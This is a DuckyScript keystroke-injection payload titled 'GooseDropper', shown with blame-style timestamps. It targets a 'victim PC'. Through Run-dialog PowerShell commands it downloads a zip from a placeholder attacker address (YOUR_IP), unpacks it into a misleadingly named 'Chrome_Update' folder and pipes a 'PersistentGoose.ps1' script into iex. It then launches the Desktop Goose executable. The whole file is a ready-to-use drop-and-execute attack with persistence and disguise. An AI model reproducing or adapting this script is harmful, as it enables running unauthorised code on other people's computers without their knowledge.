2023-10-29 01:03:44 -06:00
|
|
|
REM TITLE GooseDropper
|
|
|
|
|
REM AUTHOR Fr3ki
|
|
|
|
|
REM DESCRIPTION Grab the Desktop Goose executable from an attacker machine and run it on the victim PC
|
|
|
|
|
DELAY 500
|
|
|
|
|
GUI r
|
|
|
|
|
DELAY 500
|
2025-01-31 13:02:19 -07:00
|
|
|
STRING powershell wget YOUR_IP/ZIP -OutFile $ENV:Temp/Update.zip
|
2023-10-29 01:03:44 -06:00
|
|
|
ENTER
|
2023-10-31 15:10:53 -06:00
|
|
|
DELAY 8000
|
2023-10-29 01:03:44 -06:00
|
|
|
GUI r
|
|
|
|
|
DELAY 500
|
2023-10-31 15:29:10 -06:00
|
|
|
STRING powershell Expand-Archive $ENV:Temp\Update.zip -DestinationPath $ENV:Temp\Chrome_Update
|
2023-10-29 01:03:44 -06:00
|
|
|
ENTER
|
|
|
|
|
DELAY 3000
|
|
|
|
|
GUI r
|
|
|
|
|
DELAY 500
|
2023-10-31 15:10:53 -06:00
|
|
|
STRING powershell gc $env:Temp\Chrome_Update\Update\PersistentGoose.ps1 | iex
|
|
|
|
|
ENTER
|
|
|
|
|
DELAY 1000
|
|
|
|
|
GUI r
|
|
|
|
|
DELAY 500
|
2023-10-29 01:03:44 -06:00
|
|
|
STRING %Temp%\Chrome_Update\Update\GooseDesktop.exe
|
|
|
|
|
ENTER
|
